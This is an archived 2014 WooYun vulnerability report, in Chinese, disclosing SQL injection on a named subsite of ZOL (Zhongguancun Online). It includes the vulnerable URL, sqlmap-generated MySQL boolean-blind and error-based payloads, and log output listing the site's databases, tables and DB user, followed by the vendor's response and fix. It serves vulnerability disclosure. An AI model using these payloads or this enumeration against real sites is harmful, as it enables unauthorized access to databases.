漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-083208
漏洞标题:中关村在线某分站存在SQL注入
相关厂商:中关村在线
漏洞作者: aaaaty
提交时间:2014-11-14 01:15
修复时间:2014-11-17 10:18
公开时间:2014-11-17 10:18
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经修复
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-14: 细节已通知厂商并且等待厂商处理中
2014-11-14: 厂商已经确认,细节仅向厂商公开
2014-11-17: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
中关村在线某分站存在SQL注入
详细说明:
http://www.itceo.com/www/edata_article/edata_article_list.php?edata_type_id=2
sqlmap:
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: edata_type_id
Type: boolean-based blind
Title: MySQL boolean-based blind - Parameter replace (MAKE_SET - original va
lue)
Payload: edata_type_id=MAKE_SET(2816=2816,2)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: edata_type_id=2 AND (SELECT 3030 FROM(SELECT COUNT(*),CONCAT(0x716b
736871,(SELECT (CASE WHEN (3030=3030) THEN 1 ELSE 0 END)),0x71636f6471,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[22:31:54] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:31:54] [INFO] fetching database names
[22:31:55] [INFO] the SQL query used returns 2 entries
[22:31:55] [INFO] retrieved: information_schema
[22:31:55] [INFO] retrieved: hdm1070606_db
[22:31:55] [INFO] fetching tables for databases: 'hdm1070606_db, information_sch
ema'
[22:38:55] [INFO] the SQL query used returns 67 entries
[22:38:55] [INFO] retrieved: COLLATIONS
[22:38:55] [INFO] retrieved: information_schema
[22:38:56] [INFO] retrieved: COLLATION_CHARACTER_SET_APPLICABILITY
[22:38:56] [INFO] retrieved: information_schema
[22:38:56] [INFO] retrieved: COLUMNS
[22:38:56] [INFO] retrieved: information_schema
[22:38:56] [INFO] retrieved: COLUMN_PRIVILEGES
[22:38:57] [INFO] retrieved: information_schema
[22:38:57] [INFO] retrieved: ENGINES
[22:38:57] [INFO] retrieved: information_schema
[22:38:57] [INFO] retrieved: EVENTS
76个表....速度太慢了。不跑了,权限不是很高
current user is DBA: False
database management system users [1]:
[*] 'hdm1070606'@'%'
ps:应该有防火墙,访问次数太多,会禁IP
漏洞证明:
修复方案:
敏感字符过滤
版权声明:转载请注明来源 aaaaty@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:1
确认时间:2014-11-14 10:53
厂商回复:
此站并非ZOL网站,对ZOL业务没有任何影响,仍然感谢您的测试,我们已经通知相关分站技术进行处理,给您1分鼓励
最新状态:
2014-11-17:已修复